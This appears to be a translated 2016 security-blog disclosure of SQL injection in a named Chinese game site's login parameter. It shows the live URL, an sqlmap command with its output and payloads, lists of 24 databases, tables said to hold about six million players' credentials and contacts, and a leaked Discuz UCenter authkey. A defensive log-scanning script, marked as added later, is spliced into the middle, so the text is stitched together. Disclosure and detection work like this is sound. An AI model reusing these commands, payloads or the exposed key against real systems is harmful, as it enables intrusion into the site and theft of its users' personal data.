Game Security: SQL Injection on the 欢畅游戏 Official Site / Phone Numbers, Emails, Account Names and Passwords of 6 Million Players at Risk
2016-07-12  Author: 黑帽网

Couldn't get a shell, so sad.

There is an injection point at game login; it is UNION-based:

http://long.gamebean.com/game_enter.php?s_id=1


Run sqlmap:

sqlmap -u 'http://long.gamebean.com/game_enter.php?s_id=1' --dbs

         _
 ___ ___| |_____ ___ ___  {1.0.4.4#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 09:59:19

[09:59:19] [INFO] resuming back-end DBMS 'mysql' 
[09:59:20] [INFO] testing connection to the target URL
sqlmap got a 302 redirect to 'http://www.gamebean.com/login.php?ref=long.gamebean.com/dnslist.php'. Do you want to follow? [Y/n] n
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: s_id (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: s_id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))OztZ) AND 'RdBD'='RdBD

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: s_id=-8227' UNION ALL SELECT CONCAT(0x716a6b6a71,0x78514469644943624c58794a73766a6954436456654979657a6e6658516564716145435362735458,0x71626a7171),NULL-- -
---
[09:59:23] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.2.10, Nginx
back-end DBMS: MySQL 5.0.12
[09:59:23] [INFO] fetching database names
[09:59:23] [INFO] the SQL query used returns 24 entries
available databases [24]:
[*] analyze
[*] android
[*] bbs
[*] cjsh_user
[*] cms
[*] dx
[*] football
[*] game_stat
[*] gcenter
[*] gs
[*] information_schema
[*] lt_wap
[*] mis
[*] mysql
[*] ourpalm
[*] ssfee_platform
[*] ssfee_platform_test
[*] test
[*] test_channel
[*] union
[*] user
[*] user2406
[*] webpay
[*] yjws
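The two injection techniques sqlmap confirmed above (a time-based blind probe with SLEEP() and a UNION SELECT extraction) leave very recognisable traces in the web server's access log. As an added example, not part of the original report or the site's own tooling, the Python script below parses nginx combined-format log lines, isolates the s_id parameter of game_enter.php, and flags any value that is not a plain integer or that carries one of those two payload shapes. The four log lines are constructed samples whose injected requests mirror the payloads in the sqlmap output; the IP addresses and timestamps are invented.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed nginx combined-format log lines (not taken from the report).
# Lines 2 and 3 carry the same payload shapes sqlmap reported for s_id.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2016:09:59:20 +0800] "GET /game_enter.php?s_id=1 HTTP/1.1" 302 154 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Jul/2016:09:59:21 +0800] "GET /game_enter.php?s_id=1%27%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29OztZ%29%20AND%20%27RdBD%27%3D%27RdBD HTTP/1.1" 302 154 "-" "sqlmap/1.0.4.4#dev (http://sqlmap.org)"
10.0.0.9 - - [12/Jul/2016:09:59:22 +0800] "GET /game_enter.php?s_id=-8227%27%20UNION%20ALL%20SELECT%20CONCAT%280x716a6b6a71%2C0x41%2C0x71626a7171%29%2CNULL--%20- HTTP/1.1" 200 812 "-" "sqlmap/1.0.4.4#dev (http://sqlmap.org)"
10.0.0.7 - - [12/Jul/2016:09:59:23 +0800] "GET /game_enter.php?s_id=42 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# nginx "combined" format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \d+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Signatures for the two techniques seen in the report: a time-based blind
# probe (SLEEP/BENCHMARK) and a UNION-based extraction.
SIGNATURES = {
    "time_based": re.compile(r"\bsleep\s*\(|\bbenchmark\s*\(", re.I),
    "union": re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I),
}


def classify_value(value):
    """Return the findings for one decoded query-parameter value."""
    findings = []
    # s_id is a numeric server id; anything else is already anomalous.
    if not re.fullmatch(r"-?\d+", value):
        findings.append("non_integer")
    for name, rx in SIGNATURES.items():
        if rx.search(value):
            findings.append(name)
    return findings


def scan_log(text, path="/game_enter.php", param="s_id"):
    """Scan log text and return one alert dict per suspicious request."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m["target"])
        if parts.path != path:
            continue
        # parse_qs percent-decodes the values, so the signatures see plain SQL.
        for value in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            findings = classify_value(value)
            if findings:
                alerts.append({"ip": m["ip"], "ts": m["ts"], "ua": m["ua"],
                               "value": value, "findings": findings})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert["ts"], alert["ip"], alert["findings"], alert["ua"])
```

The integer check alone catches both payloads, which is the practical lesson: for a parameter whose legitimate values are numeric ids, alerting on any non-numeric value is simpler and more robust than keyword matching, and the keyword signatures are only there to label what kind of probe it was.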



All 24 databases on the site are exposed.

Among them, the bbs, user and ssfee_platform databases hold 2,000,000 + 4,500,000 + 5,600,000 user records (account name, password, phone number, email); after deduplication that is roughly 6,000,000 users.

Database: bbs
+----------------------+---------+
| Table                | Entries |
+----------------------+---------+
| uc_memberfields      | 1980846 |
| uc_members           | 1980846 |
| cdb_favoritethreads  | 46470   |
| cdb_prompt           | 21412   |
| cdb_memberfields     | 18489   |
| cdb_members          | 18488   |
| cdb_posts            | 9945    |
| cdb_onlinetime       | 8183    |
| cdb_threads          | 3357    |
| uchome_creditlog     | 1660    |
| cdb_promptmsgs       | 1321    |
| uchome_pic           | 1320    |
| uchome_tagblog       | 1118    |
| uc_pms               | 1095    |
| cdb_threadsmod       | 709     |
| cdb_modworks         | 666     |
| cdb_rsscaches        | 651     |
| uchome_blog          | 502     |
| uchome_blogfield     | 502     |
| uchome_member        | 483     |
| uchome_space         | 483     |
| uchome_spacefield    | 483     |
| uchome_album         | 464     |
| uchome_feed          | 425     |
| cdb_threadtags       | 340     |
| uchome_spaceinfo     | 320     |
| cdb_stylevars        | 282     |
| uchome_stat          | 245     |
| cdb_settings         | 244     |
| cdb_tags             | 243     |
| uchome_tag           | 209     |
| uchome_friend        | 126     |
| uchome_usertask      | 96      |
| cdb_smilies          | 80      |
| cdb_statvars         | 73      |
| uc_newpm             | 66      |
| cdb_typeoptions      | 65      |
| uchome_notification  | 65      |
| uchome_config        | 64      |
| uchome_comment       | 62      |
| cdb_forumfields      | 55      |
| cdb_forums           | 55      |
| cdb_stats            | 52      |
| uchome_creditrule    | 47      |
| cdb_spacecaches      | 42      |
| cdb_caches           | 41      |
| uc_notelist          | 38      |
| cdb_faqs             | 34      |
| uchome_visitor       | 32      |
| cdb_request          | 30      |
| uc_friends           | 29      |
| cdb_debateposts      | 28      |
| cdb_favorites        | 28      |
| cdb_favoriteforums   | 25      |
| uchome_magic         | 25      |
| cdb_magiclog         | 24      |
| uc_settings          | 24      |
| uchome_doing         | 24      |
| uchome_magicstore    | 24      |
| uchome_poke          | 22      |
| uchome_magicinlog    | 21      |
| uchome_post          | 21      |
| uchome_usermagic     | 21      |
| uchome_polloption    | 20      |
| uchome_thread        | 20      |
| cdb_usergroups       | 19      |
| cdb_failedlogins     | 18      |
| uchome_share         | 18      |
| cdb_moderators       | 17      |
| uchome_click         | 15      |
| cdb_ratelog          | 14      |
| cdb_taskvars         | 14      |
| cdb_crons            | 12      |
| cdb_forumlinks       | 12      |
| cdb_magics           | 12      |
| cdb_projects         | 11      |
| cdb_reportlog        | 11      |
| uchome_magicuselog   | 10      |
| cdb_words            | 9       |
| uchome_usergroup     | 9       |
| cdb_admingroups      | 7       |
| cdb_polloptions      | 7       |
| cdb_tasks            | 7       |
| uchome_task          | 7       |
| cdb_access           | 6       |
| cdb_feeds            | 6       |
| cdb_prompttype       | 6       |
| cdb_styles           | 6       |
| cdb_templates        | 6       |
| uchome_eventclass    | 6       |
| uchome_mtag          | 6       |
| uchome_polluser      | 6       |
| uchome_tagspace      | 6       |
| cdb_attachments      | 5       |
| cdb_navs             | 5       |
| cdb_ranks            | 5       |
| uchome_cron          | 5       |
| cdb_admincustom      | 4       |
| cdb_bbcodes          | 4       |
| cdb_onlinelist       | 4       |
| cdb_searchindex      | 4       |
| cdb_typemodels       | 4       |
| uchome_data          | 4       |
| uchome_poll          | 4       |
| uchome_pollfield     | 4       |
| cdb_imagetypes       | 3       |
| cdb_warnings         | 3       |
| uc_applications      | 3       |
| uchome_class         | 3       |
| uchome_profield      | 3       |
| uchome_report        | 3       |
| uchome_statuser      | 3       |
| cdb_addons           | 2       |
| cdb_debates          | 2       |
| cdb_polls            | 2       |
| cdb_adminactions     | 1       |
| cdb_adminsessions    | 1       |
| cdb_attachmentfields | 1       |
| uc_admins            | 1       |
| uc_failedlogins      | 1       |
| uc_protectedmembers  | 1       |
+----------------------+---------+
Database: user
+--------------------+----------+
| Table              | Entries  |
+--------------------+----------+
| channel_extend     | 12501938 |
| members_info       | 4550839  |
| members_0          | 650074   |
| members_6          | 648069   |
| members_4          | 647573   |
| members_8          | 646946   |
| members_2          | 646486   |
| members_7          | 640523   |
| members_5          | 640124   |
| members_3          | 638772   |
| members_1          | 638475   |
| members_9          | 638271   |
| members_football   | 66598    |
| membersinfo_0      | 29646    |
| membersinfo_6      | 29350    |
| membersinfo_4      | 29293    |
| membersinfo_5      | 29186    |
| membersinfo_2      | 29133    |
| membersinfo_8      | 29063    |
| membersinfo_3      | 28919    |
| membersinfo_7      | 28804    |
| membersinfo_1      | 28781    |
| membersinfo_9      | 28705    |
| footballuser_copy1 | 21563    |
| members_point      | 20073    |
| members_fmworlds   | 5047     |
| zq_point           | 2703     |
| a                  | 1355     |
| footballuser       | 1000     |
| invite             | 25       |
| partner            | 11       |
+--------------------+----------+
Database: ssfee_platform
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| p_user_ip                     | 6538408 |
| user_info_201112              | 5643243 |
| user_info                     | 3971775 |
| p_area                        | 2869631 |
| advt_stat_hour_201201TO06     | 2474046 |
| user_info_201102              | 2234956 |
| register_after                | 1738043 |
| advt_stat_hour                | 1559224 |
| advt_stat_channel             | 1082289 |
| advt_stat_hour_201101TO07     | 1069454 |
| u_ip                          | 376052  |
| advt_stat_hour_201101TO02     | 344281  |
| jiaose_sssg                   | 186520  |
| temp4                         | 139504  |
| advt_stat_ye                  | 117002  |
| advt_stat_hour_20108TO10      | 101229  |
| p_area_Integration            | 57078   |
| temp2                         | 56822   |
| p_newsbase_201206             | 49845   |
| p_ip                          | 45309   |
| advt_stat_nq                  | 43122   |
| p_area_Integration_ip         | 25881   |
| seek_gateway_fee              | 24020   |
| p_area_register               | 21292   |
| seek_gateway_fee_bak          | 19978   |
| wapgame_zhuce                 | 19034   |
| jiaose_long                   | 16060   |
| user_info_mj                  | 11834   |
| sms_fee                       | 7404    |
| temp3                         | 4679    |
| get_user                      | 4035    |
| wapgame_fee                   | 3921    |
| wapgame_fee_bak               | 3626    |
| p_newsbase_tmp                | 3421    |
| pc_jiaose                     | 3134    |
| user_stat                     | 2809    |
| p_ad_info                     | 2590    |
| seek_gateway_chengben         | 2381    |
| seek_gateway_chengben_bak     | 2368    |
| p_user_ip_copy                | 2355    |
| wapgame_fee_201109            | 2355    |
| sms_fee1                      | 1772    |
| jiaose_yan                    | 1096    |
| p_newscontent                 | 966     |
| wapgame_zhuce_tmp             | 927     |
| p_ad                          | 895     |
| p_area_Integration_copy       | 742     |
| lm_info                       | 704     |
| p_newsbase                    | 665     |
| haoduan_ds                    | 345     |
| bd                            | 295     |
| bd2                           | 295     |
| lm_info_test                  | 288     |
| netgame_stat                  | 243     |
| temp                          | 216     |
| seek_gateway_fee_tmp1         | 154     |
| p_area_Integration_ip_copy2   | 132     |
| p_area_Integration_ip_copy1   | 118     |
| p_area_Integration_ip_ddd     | 118     |
| p_area_Integration_test_copy1 | 116     |
| baidu                         | 112     |
| wapgame_fee_tmp               | 101     |
| p_user_ip_are                 | 99      |
| seek_gateway_fee_g9           | 92      |
| kuapintai_fee                 | 91      |
| jiaose_ly                     | 70      |
| u_manage                      | 68      |
| advt_stat_tmp                 | 62      |
| seek_gateway_fee_tmp          | 62      |
| seek_gateway_fee_lr           | 60      |
| u_admin                       | 60      |
| netgame_stat_tmp              | 49      |
| sms_fee2                      | 48      |
| p_area_Integration_ip_copy    | 36      |
| sms_fee3                      | 24      |
| seek_gateway_chengben_lr      | 17      |
| u_group                       | 15      |
| seek_gateway_chengben_tmp     | 14      |
| wapgame_fee_bf2015            | 12      |
| p_user_ip_tmp                 | 10      |
| data_manage                   | 9       |
| p_newsclass                   | 9       |
| wapgame_qudao                 | 9       |
| p_admin                       | 6       |
| p_area_Integration_test_copy  | 6       |
| seek_gateway_xz               | 6       |
| data_admin                    | 4       |
| jiaose_djh                    | 4       |
| yuan                          | 4       |
| data_group                    | 2       |
| p_adver_admin                 | 2       |
| ios_xml                       | 1       |
| p_config                      | 1       |
+-------------------------------+---------+



It also leaks the Discuz uckey (the UCenter authkey in uc_applications):

Database: bbs
Table: uc_applications
[3 entries]
+-------+----+---------------------------+----------+--------+-------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+--------------+
| appid | ip | url                       | name     | type   | extra | charset | authkey                                                          | recvnote | synlogin | dbcharset | viewprourl | apifilename | tagtemplates |
+-------+----+---------------------------+----------+--------+-------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+--------------+
| 1     |    | http://219.232.240.2/home | 个人家园 | UCHOME |       | utf-8   | F0q1C5wclbJcieF6i6F03d3eDd37V4K10aG6y5I7qeEd97mcN3b3t43a21UfGai6 | 1        | 1        | utf8      |            | uc.php      | /r/n/r/n     |
+-------+----+---------------------------+----------+--------+-------+---------+------------------------------------------------------------------+----------+----------+-----------+------------+-------------+--------------+

Solution:

Filter SQL input.
